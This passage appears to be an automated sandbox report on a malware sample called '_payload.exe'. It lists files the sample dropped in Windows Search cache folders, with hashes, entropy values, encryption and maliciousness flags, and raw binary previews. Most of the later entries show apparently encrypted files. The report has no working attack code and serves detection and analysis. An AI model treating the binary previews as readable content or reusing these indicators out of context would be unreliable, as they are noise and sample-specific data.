                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\edbres00001.jrs

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):524622
                                                                                                                                                                      Entropy (8bit):3.2077756909426447
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:XTyBdhSghrUwvsxbE1GO1wlbyH1K07yqaZ3HsyWfMHy:ehccstEkbyVK07yq+ep
                                                                                                                                                                      MD5:6FCB42ECEA765A584FA4C94E62C6A0EC
                                                                                                                                                                      SHA1:562A682C9ED3A1FBAF78561597BDD5E2D6F5CA68
                                                                                                                                                                      SHA-256:BDE8BF3508D5E01101B14603FE400A22404A548D6FD5F75554343D044045BFD3
                                                                                                                                                                      SHA-512:D05BD7D2C56F7B66D3A908DF04D7998C9915AD0D5412BB3C9F29196A2CC12683D7083190B865ED5FEC64A972C208C2E57693C57AF0CF5AF860A8D98CAF4D95B5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......CsJ...l...x._....g..a.]a..+....e....h.x......$..@..N..q1......).."...c....Z7.Bq.}.....6..............Z.....S....#.s..K..+....d....q...s....%.M..I4..g.z.G..~.7..V.....8.D}.&*.:.9.N@F&...p.f..#..i...../.}%...U..M.G.l~rW|.....5>Ur...P@..P....v|.....z..9.....{.r@yf$...].lJ.......G.r@,!..._...M.K%vIs.}.vT...rm._~._n...@W...~(.P"8....v+...x..k.q.z....Q...e...=.....:..pc..F.9..F......N....4@..K....?....U......H..YG...8.1*.B`U.f6....O...D.!.m>y.|..qDZ.....E...............lu\...B..`..........Ws....,..q.Z...a.....a....YH.z.y....p....F.>..."0<.:..AXb...p.."..]......0.C3UQ...n...........\D.9..0....#M....^C...9......F.%.....`.......;$c...Z..............Nv.m....M..b2....:.T......z.(2k..bo.X.Y.......l.P..q..@;&..b............i.s;<.....|*W........)QxJ...L.k.8..lL../GK.($O.z.x.....81.!.....%....e..F...X"P{..W.h.._-..<4.....l[@..#~..+.l...=./.....S.....{......g).6.|U.)b....k.t..@J....0...u@.fi...Gt./.F......xE.:.i....E......p..H.2..Q..y=.I_

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\edbres00002.jrs

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):524622
                                                                                                                                                                      Entropy (8bit):3.207690658573619
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:eL5aV+ADaLAbRBqvVlCUbHgM+BYRnACTWGaeDVuw3a7/N0slOu5E/:eLYVxDJwNlP9IedTZna7ZlZ5a
                                                                                                                                                                      MD5:B2F858756764F35E705F1DC74194B98C
                                                                                                                                                                      SHA1:A00632905D8C386E187785990C56D06B8B068D29
                                                                                                                                                                      SHA-256:4A9B94819D38EF572974C89C45F0A44ABC9035147EC168636A590EA9374EB134
                                                                                                                                                                      SHA-512:82615B051C08BA312C4E6E57D21EC34DF8005E69B75EC73745F9446CD208546CDF6EDF6E389755D8E2212FFB5EC2866A0585271316AA865F04421E57B14220A0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.......In........qi.S`3f...d. i.(..."..pH.]..5..P.....H.:.p..........E.5,.V .._.xK0..#.P.G.."..eKS}.awudm..A.b.=..9.*.. .0.&.-=...._b.L.q...j.V..+8.O.....C.}.... .bz.D3."..........J.b.Kw].V..<.5F.$....J./25."....6.K}Q...N...`.r=t25.p,0.68N..L..+./.E...L.M...yY...w..._Tm.-....C|:......S...1.2...23.Tb.....lc.N.;R..z..I....'.'G.JQHd..'.oM.\A-..UQo.....$...$.#M..NP.j.:.N.!........3w8.....!.tO#.Y.u..8SZ..}.}.<.N...c.*Oh."y-....(.0%....jI..n......A...W...T..j'%YI.M....`..F..... ...[P.JB.86.....7v.I....0.k.X....X.....ye..A1B......R.U.sE...-Z8.j..,../..f...fUQ.1.Y`ex`.ISI:@.wI...w #..h..1fVQ.|o...LgJ../.].:{.4v..3..mw..@x..Gk.1..i.FMs...l...-.$M.cA.%...:X..BS.".....C.8b..I"^g.x....'.r.P...X2.....ZD<_..$......&8:x.o...K...>........>....{..87L.xm.6..U|......v!."uP;.h:A...R.{...7.HQy.^....:..T...0...*..3.r.F.&..s.;..!Y...I....}..V.3V.....zj.A0..Tk..J[.~\...@...%.&..~...[n..(I....c..K.`..iY.2.0.4 .*.:U.p.ClW.Dd..h.Q...q/...B...`.T.4....gv.....4H.&}G....

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\edbtmp.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):524622
                                                                                                                                                                      Entropy (8bit):3.2072091167328236
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:3aAlqjJILPSy7JqPI4Xm6r8fu0DdEEeXsaCHYqGfUztdMXrsJljeE:KAiJK77JqPI4W68DraRU7F
                                                                                                                                                                      MD5:6D6F4276DA1E1256B27A92AAADF7A9D0
                                                                                                                                                                      SHA1:09F746BFE389F5F5F669EDE670503EE8A8D2DC66
                                                                                                                                                                      SHA-256:052A82234DA15E89D6FF6F0107A3C8DBC1FDFEC0D4B7224FF99D29DA6C5551A9
                                                                                                                                                                      SHA-512:2F8814147FF0243E7954A3C89E89326A9629D3132EFC5D15E946334474515E7C6A3DB4C905A1012B245DDA653D03B7F7C1C7E460261946FDF96EFF4745025580
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......wY]......s......m......m"x...?...)_P.....C...U.D.c..$.`.#...K/."...&!...?.O..$....?iuB\.;Vw..Yl.......A..w..P.\....@...U....~.M....T.b..m..y..e.....r.@........S...&....G.d.C'Y`t`+...'.J.Q.;.R.Y...F......%}..l & .^.=.n.....H.r....;..>.m...j..F.q....]..3..:x4..r..Gi.D......)8.8....p?.y)....2.&..Y.3..... .....2c.7.2..B.......A;.K@.?t..}....Z.aH..t6.D..#8z.(n...xL.+..S.ve.V.IZ........D..nW.n.hG+F'..sKi1a.R..X.qd....JI..."ft.C.=.K......qy{#y.o..g.....4\,.D..A....H8|9......z.t(.^r_...x8S....6.hldr......v.....W.t<@.Z...S.:}.....*(..M..,....W........}.|..7.....n|...f..=).<.k..5g.b..Z..D......j..u.........M.].x}8"...R.P_......1-0.e.k@n.;...osD..W.............1T....<T..fnLT..l:....g.'...pi..tV.r.'......jV..Q.".yD...:C.PRH2..V..jm..w..C..?..Nu.'~..l,...8J..=.#....|......../.^.P....~RC.jm......I...d.-...."/....6.2..O....==..J-.0A.."..Y9.$y.BD.B+p..G.W>..!....DjI%...:lO.z('&YY.b..........Q5.R..`..u.....[..p..g....7..F'......,.{.,....v!\$..}m

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903167889885.txt

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):105937
                                                                                                                                                                      Entropy (8bit):7.998276852847548
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:3072:PDGmR2Zy68UNfT+fOEftDOh7QwdPw7DL6:P6s20UNb+ntD7v6
                                                                                                                                                                      MD5:DB65D12D4E3C7557B4FEF7FD35EB06E4
                                                                                                                                                                      SHA1:8EF2E7561AE2C5EBF0B3318E2A1A518ABBE5EEBC
                                                                                                                                                                      SHA-256:142C44197DC6371C24CD9DBBA107C09882F30C5FB7557E87CBEB92BEAB93E8B7
                                                                                                                                                                      SHA-512:0C172F0EA7DA0746534778FAFFF91F28276F7FA2FC0A071D77C4EF6E2841B85888AA762623F63DD4CD04101F315AB5225498A8A24B1E4AE010A7EE779A901F7F
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:[{"Sy1W..Qv4.*..I@..pr1.#{+>..1...27Z.#./.f..=.v....J..+.I..V...yf...../Q..!...T...mR...B.t.eWR..D......io..Z(.+....Mv.$S.R.....".V/#....1.....e-q7I.S...v.a6c/....u...0n...uWx)[m..:..Dh..0S&\.lI...3.L........\..'..-.~.+.h...*.....!.v.......a.p..c........LA..k.%...w.....C:iXk.Z..Pj\...~.k".K.z.'..T.uO..s.......ye.O.5Kx<..z....J.h......*.@....P.&.!.}..Y.... ...?..'`I...p....2KhBRji...^....L..|....V.a.j.P{e.h.]8\...J.".7..P-...x^%..h...4.....J4.6.E.....y..~D...=.P...U..D._Yi..U..A.K9m:*............m~.,...w.V.u3...j.-%,.....".T.W..=q.4#o.....z...d..h.!..wmXR.....A.K..Kbe.. ...E..yx.=.%...G.1...Z<........8.`F...l.F...j;.{X..T....Z.U3.......+...P..tW...pY.0...W..3......+.U-...<{....=uN...f.,.@.....>Y/.2..I..E*.*.}.$..+..P...../p..6Mp.'..$.yP.X.y.F...sU2...b.0..9.....qjkE.... . ...B..z..~....j.....x*;n.5nT...J..s7=W.- 9*.X........&. .].Tx.?...)..F#..........a.....+.6..I.-C.=T...$.{.-...5j.........NU.)..%..6Z.._'.._.&*9...../UsW...r"...h<

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903214673664.txt

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):105937
                                                                                                                                                                      Entropy (8bit):7.998095266567697
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:3072:pOjY8Tqh1qtku3XuusQ+e7Ay0Htq7bxmkUuvJ:pwnTqnqtkuHuD+7qNOmk/vJ
                                                                                                                                                                      MD5:44A1935C1A963717E1DB0D483CD65479
                                                                                                                                                                      SHA1:45E742834B8A0F38EB81CCDF49EB78E18D51B11E
                                                                                                                                                                      SHA-256:D30F0F7E6354F7716C581B22B967601F8BC1AABBBCA1D683CD42A1AED533B1A6
                                                                                                                                                                      SHA-512:9477D1FFFE24CA1A8D35EEAB58F901C954E85CE4C52168C7E9474D02A4C3B7E7C8D6CDDFA39202E5FDA92D4603FB617A358702DE7E6807DE3BC1F888412EAED8
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:[{"Sy..;."....^.q...0^[&...BU.....5.....f...o.p..............*/B..Q..S.../.....O`....J..=.W.J"1..\.... ...U.X..V.r.......Q_ .....H%..(.N.T/.U..c=B....J.CX....O.^?.?H1.O.g...K.....'....zH...fN.H..>.T..I.+.8...e..oxY.....v.X..o...R.%..48."D.y..Ho.]..1p.Sj.`..Ys.... 1..2g..t.d....@....q...tp2.m.*..=qzR.....")[[@..qt.xl.v.GGJ..O.........41]....3.#.F.A%.X...4..c..~..N.v}.....?..5M..........^&..fL..W.......1).V../.......G.8...[..ow.......o,..KD...t.V.0c.hm.:8.Ae%f..s..._ea..i.z.q.E:.........#..&.$.G:S..!.q:.3.../.M.....E6...pi..j.n.....F.+.>Xak@g#..r.....%p..p?K:T27.k@9/.lG<.V....?.In.w6.w.......8...f...l>x.Mb.v..Qj....E..~v.U.0..O]....8x.r......O9.......i..3.....$/.,."w..S...a......P.:.......N.-.c..]...e7{......=...%.&....Y:.c.?.../.W.d]8m..YmT..u.D.Y...\|9..9.5\'.Z.*..+$...f..........,.4]...Fdi.'.qS(....&.&.Y.#...EUY1a$t...0&..."S.lW..'(.}.B..1m..8..:.M.x.....nn&.+...8f..I.t.^...|..s.Nn..<75..1.w..M.......:....].E.h..8..-...)1E 9.'

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408904996229952.txt

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):118527
                                                                                                                                                                      Entropy (8bit):7.998261957628092
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:3072:rZW9CYrPgXwlw4k9NY6JNC9sqiUiCJpQUy32:lW9CYA9l9xUxizUy32
                                                                                                                                                                      MD5:5357193C853CF9F7E5137E61496C2392
                                                                                                                                                                      SHA1:EAB3328963E2A42916549EEB1C1B2997D1986DB0
                                                                                                                                                                      SHA-256:1C5F53303A59D7C46F9AC4829577675FE0870666E4C982CDA80F82B7393374CC
                                                                                                                                                                      SHA-512:5C7223405A895903ADA3E3425E1226680C94DBA8B1AD3A5E2D52C53CA5AE78866C15FDDBA1A3D554D5472E2E0932D64901954E07C44DD93A54FCFD6D0120C0FE
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:[{"Sy..`9,G_.y..9Lv.O..D8.R\....y..(E.57.%..V.7...t.6...LV...`..5..fi..3t.#.i...Lk._..T......i...Cjw+DqS.O....|.....0u.Y.X...:.~S.,.....:xV.b.".^6|x.lc...R.F5$..FO...I.(o>..`B.W.pc...:.'d..T%.c.......4....e..J.;^,~..d~..8f......G..H...=/.O..'E:.F2.R.(."&....e.Y..mj.F^..1....h\. Ys&../...9c.,........f.fO;$.'....e...q.|..?...[...c)U.A....6..-f......."Y...A...]....2..\.[V...v.[..%..c....x...>.&|....W...J2...d. ...o.)..W.... g..*....u,..Sl...f-Q..m.K.S<..EKT....C..`....T..r.Qb.\..+V..u..B5...l....r..r.(.%NM.......V....L.H.HS.gSNv..%s).@.=.!3.c/Y9.x...:%....^{...*.S.<~..O9.Y.?.E.D.)...{9..0...Je.F8.m-S.......">.U..Y...&I....f..;....N..GT.....^K...b.y^.......}.$i.t....._.{...(*=...g....J5. &..i.....|n"n.2Y.'.I...`.........'%.h.Q.>.....%.....O..m9x.0.%[.....7j..47h$......`....#.w..3o..Q3..j.2.O...1J..v...../r...v6...8.........l<.....|...#.Qo..`..B:...T~..#......`.p..} .Hs#.f..y..A...'N...ct....S.Ba.v...VS...v.Y.J.*n..3.*..D..s...=h..

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906321630689.txt

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):118527
                                                                                                                                                                      Entropy (8bit):7.998211209789028
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:3072:H1szTs0AcCjNAuVkEhmloXYq3HCCpZGSiQf5:H1wA05C8EgSoq37FiQf5
                                                                                                                                                                      MD5:7B2041311DCE6B80917B3BDF48E3AC9E
                                                                                                                                                                      SHA1:18641292DB54E4AB7115C8A568D09CF34B4FB47E
                                                                                                                                                                      SHA-256:8BCCC8326D4293955132FBC4E7E351F739A84C2DF279D11DAA4CE77575E5924A
                                                                                                                                                                      SHA-512:3192BFA1EDF2BBAF4695723E5263A69A5AA4978AF836E28E49F7911A59238A5379B9396DCD340BD3A10DB102DF7222C794C109795B2D71C5E613F7CFB784813F
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:[{"Sy)./.Kz.H.z..+.;....t..5/.}.v..z.(\..._.W..yz=n.....>p.&..`...w.QU.D..0.>Li....c-H/...e4:...#.y;dU.z....:....4.......i.g.,......a'.....N<^..Z...8P...My.`^...{.j...%G.S\.d....L.C.........M...jN7.....Z].MY.o.s......$..#<Y.mXt..e..K.. W/..7......vG.Q.e.vT.....<L%.../4.C.L.#.M8.n........eL...:JN...g6.U..t=.P...&b..........J.W.I.....=./.>?]6...eei#.j.>).4.\.....4.DU.<..j..s......n.g..0....."....a....*)6J.;........V.7d....n6.Z.l.zb.......s...C..P..b.R..-.G...B.K?.^(8Q~..Ky...Tv.N..yE....H..O..X............J.........v..;.6..m.7.=<..0.].Cl....~Yf.i.....[..1E..w:.UDmtg6.M.'.MO..."K..Q..d...2.`..y./n}JU..gc..L..e....+.}...e..ru._..~..9.s.....w...Nc..5{.rI.*d...)..Q...!S......S...`TG.)h5...q"..D^.Me..J..+......u...B..v.h.J_.......P..kz.T..4!AZ...O.......A.)s.d.v.,g.rO.......H.=.`e..jj.ovB.x....Bt...............cs'x.Hr.....O....Wtd...=.......3......G..B.D..!0..N.W.+....6U.].bc/...v.cU0.G.=.b.dig.9...59...s...$h.....y**.A.R.d.-...~.:

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906620712704.txt

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):118527
                                                                                                                                                                      Entropy (8bit):7.998500879427296
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:3072:elvu78QhXmIrNoNLd6351jSVoNoy1B4xNY:elvGdBoLO5NMouyL
                                                                                                                                                                      MD5:6A5E646130D79ED5D75F0FC7CCA0A003
                                                                                                                                                                      SHA1:282366E3F282C7CA6BF6A846D75D2576ED134245
                                                                                                                                                                      SHA-256:46A883AB06C353E7EEE6BB74A5F2F3EAB09F84D9BF0351AB96B1E5FAE89D6FDC
                                                                                                                                                                      SHA-512:479D25452F32CEBD4D43876C5CF55A1A231CB168D1B1635AB6C2F8FE28C1EC4A39153741854B429B2FB06C89CB3235109C5A7945E0F40588386013D40EC7BE4F
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:[{"Sys..De...iq:...4..C.....z..~.\...P.......t......."$.....B.h8p..5?vm.%...L..\.......r..KXa....xH.]..._....~m.^....J.<H...-...M.....i@...c......#.r..I.. &..z.Yp.uJ.3..7........b[.f.;x.Q..S.E.d...fn@..@...........YM._K..h.."2....$C+......^.....Sn.C...S.}:..X@Hj.Z.D....#..p....~h..i.0.f...}=l.....w...L_..<}uKm5...f,.V..S....(.X.Q.....S...;.j1.....SG..4.......P.J......wP0F..w.......3U...h...W.l..%^.. ...p.mG;7;...Y..:.....mr..i..x..~...AT.2."N............{..6..RE....-..wEP.a...A...*"..s.uVz..o.l.m:f.fY..<E....F..p.Q...<W..DgX..D.&7.r;.......N...&.x-).[x{VR..*.*...!wx,_.=?)..I..kS. ..`s...........0..#.E..gm'.Z..&.P3.. nQb.S.....C.(].;...b....1..PFq..3......OSL>^.C.....4....bl2]c..:..U"9'G..<g....A$.....d.j...J..J...Y).M=....)3....A.W.".....3L?.....`C.$.W..~.`.<...T....M..K.Mr...'...<.F..*.;O..6..^..O.~......5..+...'"....m....K....^..l.1!f|....z.@.Y...fj.XN.>=9`..q..?0.<...q./....9L.....s.e.dG....w...*J...w..^Sy4&.F

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408907975188232.txt

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):117246
                                                                                                                                                                      Entropy (8bit):7.998363277257672
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:3072:yZZnrD6tBd1vkirD3yNAI31qA35qCvSmz5DhEcFv6Eal:yfruvPOAI31qc5qCXdhEcFSEO
                                                                                                                                                                      MD5:1685603E996E5A8B3D580FF1E309D73A
                                                                                                                                                                      SHA1:8EF3B9C26CDFBDE4ADFAD16AE44EDBBD136BFB6E
                                                                                                                                                                      SHA-256:9DA0C76F9329793936A59AE6D3B8F6D3A1CAE6F542D4A953CDE13D5DBDF19512
                                                                                                                                                                      SHA-512:118A8B30889DC0B233C01C0B03F3A438D353A50E8B3024027CD3B14C84A9F59AFD47F809A0087834C5D3962BB806384DBBD9626F71BFD3E6E3956DC335900553
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:[{"Sy,.Uce.'..K..+J.Z.Mm..d....._.X.@u...:.h..(.......JRu..v0b.....j.$......#..z..~.`.+ry.W..,i'.....P.%....s..2.Ib.5.$..O.g.c.c......&.K..,K5w..b.c^..Rw..C.>yr.)..3.*/..k.x..w..G8.+..y...8...Ds.dxL...`2dP>m...qou"B...?q..rj..zb.~..._..)r].m.-....^>..S......-@H.R.`.[.S........(....j. b.....0^..E.a.|'..U...>0...g...2h/$.\i...7../Ec...2b1.L99.......tLR..o.."..Rj...... ...Io.."&..#...~.^......P....c.....=....'?...K.{.y....... .....V!.(....6..oX 7W...{u..T...p...@S....R.2...'...C.5i.....8.y..8Rr..a.a.d9.. .....vp....E5...C.Jv.EEB...f##..xd.-..$1..7=.rI.S...k.....(..7.n.@.k?.....r.`...0^.P..}......w.=..%...g..._/id,*.X..t.K.8B..&........l....nqC..=.Q..Ta.f.Yt...p...7iNR..........g\..Q.....y.....d#.............m.(`.j:_..nVW..H..).`./C4..)..j\..w..q.N.}.os......2..=g.....;.Z*..l#sr.....B...X,..s.x0M..e1....e^....}..X_....I.>....!d..=..{zZ.S.lw.D...x..x5.p.N lE....=;.).N.%...3U....0.."i....UM.....c&.F:Q.:.,gV.p.X.].n.X26~Z.4.:.]6.A...c...)../.g

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408908224609935.txt

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):116817
                                                                                                                                                                      Entropy (8bit):7.99834229687958
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:3072:TvyRhFfuM/DmOCD9tRmvC80sDHpXQbLDEx8BHBnkRfscOK:ryvtugDmOCD9y/LXQb+8BHBnQscOK
                                                                                                                                                                      MD5:30FD659557EC7D6F0D75714F244E8A98
                                                                                                                                                                      SHA1:70E96851E08BCCAB4D466737C0C07AF4F1FED6D9
                                                                                                                                                                      SHA-256:E9FDEC69F08423AA984ED660A5419C76AA47DC262C9778AC8A6B5E1F7B85825B
                                                                                                                                                                      SHA-512:6604C9711C830030533F24157388315FEBE6916E5CD965B160830CFABAF934CCDC3265681C419764ABFBB378DAF4A000D67CE7C89B1F9E8755245A1C26FE8359
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:[{"Sy.:......Y.]B}.KF.|..............Q..q..b.Jf.\.......Ta.D..x5....g..<7_S6L..Q..u..Y.2k^6.KI....d........c....p..:U.W..s[3S."...'oY.b.C.t;Pb.3sV..HZ.&.4.....\....r......"..X.Z?.T..Y.. ...G...j%6F..]v.oN4...q..'...P0.{.aE.9UiF?.M.2.g...G..`."..9..D..B.M.T..D....2.jm..@..$..\.. ....8b..{....1....G.S._........t..s!....l....g....,..:Ano`0.S1..Yh..9.<..=.@.(A.J..#..\..,.L.vN..o@.5.....L..=...B.J.eo.x..t...k.,...gzN.}^.B.8.2...dC.U=....hh...*...;.)..F.(..m...o...\.*..f.L#...hA.".......r.e.."N.C\&.F..01.|aE.h.Dwk......m2%7.oQ<..e.d....z!....0..!...#....T.M>+........(0K\.@.,........,.L......G/Uf....0D{:........}4..-0...E[.I}$.'G.&FMT....*.y..f....+M..M.^..WbK......S..~;$.h.....{.<.`..]...{..Wuz.....O..1..*)...xl......*5......J.......v.C..Vb^A.k.M..M..e.|.,. p...I......".0XU.. .....]...5g.t9..%....@..Z.<..7W.....8LW.....n...P.......V-b/~.Pz..^.B......Y.}&tr....c...!.....y=./-V.P..~./BQ.U.mg:9t.XR..7.Z...` e.C.H..73.....OI.W.....h.....e. .d...

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408945543294083.txt

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):115275
                                                                                                                                                                      Entropy (8bit):7.998549933619998
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:3072:g6upM2NU+2AfZa09wWGwR5ZflN4gnFYRP1sB1H50uBE:/up3NU+26DCZwLZfcYYU1H5fS
                                                                                                                                                                      MD5:95440F8917A15CCA85FE8ECA2D9EC746
                                                                                                                                                                      SHA1:AA420B0F61C29E0572994F5A77161FCD81D8B341
                                                                                                                                                                      SHA-256:34E4452FE1E9082603D1BDEBAB8142152E41E374186849AF294A60E8A3471A72
                                                                                                                                                                      SHA-512:4F782E9505C3EB36AC19AFCC001769070B9BD9C141C4BF61428BFCAE0B4B24149F8D8BDE17C035E3DA60282F3C7E75BD2375BC7AF3B784DE4ED4801ED133D43A
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:[{"Sy..y...2.92....E.`T.r..s.^.....Gq..<.....nHb%...-c...M....7....(0}...S........A5....D.f..D.+...O.....\c.H.[.s..<b....y.....U.=.... .+$~Z%.aaV..n.d.LQti.J..G'.f.....R..B.zo.......B.........{t.............!.n.c....g..l.z6..+h..Y)...`..Rq....J.&.....(....\....2.\%..J........].G........s$_.....?....4^.......[o.z.'..,........o81e.>....c..u.$.b.<.\.......4D....$<.k...;.;..,...lf..|.+?.Y...p.,.....U......./....._]..........*....}......}....:a~.X.........[.V$C.,.~...|........p...1.\...=..:.Sd4K..k...Y...(r.....9k&......5+..b..9.[q.\_vF.}M4.(.TZ...l........c.y..O..o,.~.GZ#Xj...K..u.35_....rw2.Pv..0.L.`.:...CK..Ft.&p]$.:.LK. ..b.K.n6........N.....,+...[....n.......rh,.).....pbu.& ...5).5sP...:..\........Jl.?..K.....>M.+.N@.im....n....K..P....IX..aV..TnQ.K.J8h.t.\.0-.J...[..od.+I]{.vN.u....".N..}...T.j....h.g...T.....<.q.S...i.).U..`L%..S\2.8.O..v..h.F.8.i.Y.$..qD........D....<.!.6.Q...".b6v.!....E.p......G.'U#c.k..].e.@4a..^r.*4.^...p..h.

                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133495120919029457.txt

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):115275
                                                                                                                                                                      Entropy (8bit):7.998414233635635
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:3072:mbf0zF+X5nuTvB9EGNgy9H+LfDzienuwPn1ZQ:mbfEFzjffUfDFuwPrQ
                                                                                                                                                                      MD5:AF52496670A66CBCAD2D57E0C5F213AE
                                                                                                                                                                      SHA1:A3005FB0C56E68F92F7C14F429B970012A961944
                                                                                                                                                                      SHA-256:504A86427B5DA926F6D3CE0543C52AF2DEC11B14F0A3BC6A3C77838DB860ECEA
                                                                                                                                                                      SHA-512:B70E1A5E9D13E1AE4503B59CDDAE8E69735AA2494F126ED73CFFE08B092135F4E07DF5B9F16B4AB4A16B61138DF4A2C8D6F3305EA3B385FCD769BD90D2E293F8
                                                                                                                                                                      Malicious:true
